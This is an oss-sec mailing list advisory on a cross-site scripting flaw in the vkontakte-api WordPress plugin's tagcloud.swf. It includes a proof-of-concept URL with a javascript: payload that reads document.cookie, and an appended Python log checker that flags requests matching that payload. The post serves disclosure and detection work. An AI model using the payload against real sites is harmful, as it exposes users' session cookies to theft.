oss-sec mailing list archives
CVE-2009-4168: WordPress plugin vkontakte-api XSS vulnerability
From: Henri Salo <henri () nerv fi>
Date: Mon, 11 Mar 2013 09:44:33 +0200
Hello list members,

Plugin URL: http://wordpress.org/extend/plugins/vkontakte-api/
Affected file: tagcloud.swf 368b01e1728111f99d93ac5805d97abbb899a910
PoC: wp-content/plugins/vkontakte-api/swf/tagcloud.swf?mode=tags&tagcloud=<tags><a+href=%27javascript:alert%28document.cookie%29%27+style=%27font-size:+40pt%27>oss-security</a></tags>
Affected versions: 1.21, 1.22, 1.23, 1.24, 1.25, 1.26, 1.27, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.7

Currently no fix available.

--
Henri Salo
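Added example, not part of the original post or of the plugin's code: a log check that flags requests matching the PoC pattern (a javascript: href inside the tagcloud parameter of tagcloud.swf) and separately reports plain requests to the file, which show it is still deployed. The common/combined access log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path from the PoC in the post; matched as a suffix so installs in a subdirectory count.
SWF_SUFFIX = "/wp-content/plugins/vkontakte-api/swf/tagcloud.swf"
# Request target of a common/combined-format access log line (format is an assumption).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# An href carrying a javascript: URI, the construct the PoC places in tagcloud=.
SCRIPT_HREF_RE = re.compile(r"href\s*=\s*['\"]?\s*javascript\s*:", re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded values are still inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return 'xss-attempt', 'swf-request' or None for one access log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not unquote(target.path).lower().endswith(SWF_SUFFIX):
        return None
    for value in parse_qs(target.query).get("tagcloud", []):
        if SCRIPT_HREF_RE.search(fully_decode(value)):
            return "xss-attempt"
    return "swf-request"  # the affected file is still reachable on this site


# Constructed sample log lines; the second request carries the PoC from the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Mar/2013:10:01:02 +0200] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [11/Mar/2013:10:02:40 +0200] "GET /wp-content/plugins/vkontakte-api/swf/'
    'tagcloud.swf?mode=tags&tagcloud=<tags><a+href=%27javascript:alert%28document.cookie%29%27'
    '+style=%27font-size:+40pt%27>oss-security</a></tags> HTTP/1.1" 200 34567',
    '192.0.2.44 - - [11/Mar/2013:10:05:13 +0200] "GET /blog/wp-content/plugins/vkontakte-api/swf/'
    'tagcloud.swf?mode=tags HTTP/1.1" 200 34567',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry), entry[:60])
```

The check is a heuristic over the request line only: parameters sent in a POST body do not appear in access logs and are not seen by it.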